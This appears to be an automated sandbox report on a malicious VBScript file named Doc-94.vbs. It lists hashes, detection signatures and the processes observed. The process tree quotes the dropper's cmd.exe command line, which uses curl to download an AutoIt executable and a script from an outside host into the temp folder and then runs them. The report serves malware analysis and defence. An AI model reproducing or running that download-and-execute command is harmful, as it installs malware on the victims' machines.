Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
13-10-2023 13:11
Static task
static1
Behavioral task
behavioral1
Sample
Doc-94.vbs
Resource
win7-20230831-en
windows7-x64
2 signatures
150 seconds
Behavioral task
behavioral2
Sample
Doc-94.vbs
Resource
win10v2004-20230915-en
windows10-2004-x64
5 signatures
150 seconds
General
-
Target
Doc-94.vbs
-
Size
25KB
-
MD5
d050315ff65ebef0ba1352167126592f
-
SHA1
e2009bb0ccae9b82d57c45d7b6c39d76faded05d
-
SHA256
1e8a6d34c0fe5a5ad2fc1d6ff7000bcf8efa0704c397cb6ef021c2692bf17fe6
-
SHA512
e5e50b1ab9e4d939d401225daaa98cdcd5696813aae91538f911202982b2937229faa358f5a8ba4094c2c5121e0e236ad00f857a36b91891f10061dbc08c1b46
-
SSDEEP
768:3IvITQgdN5RyiUiK3IfJO37NwNGFFNWePDUirUif3IhBN67e:3IvI8/e
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 1876 wrote to memory of 2432 1876 WScript.exe cmd.exe PID 1876 wrote to memory of 2432 1876 WScript.exe cmd.exe PID 1876 wrote to memory of 2432 1876 WScript.exe cmd.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Doc-94.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" f InStr(1, WScript.ScriptFullName,"vbs", 1) > 0 Then:path = WScript.ScriptFullName:end if '/c cd /d %temp% & curl -o Autoit3.exe http://whoernet.co.com:80 & curl -o dftxsm.au3 http://whoernet.co.com:80/msifvwjscyk & Autoit3.exe dftxsm.au32⤵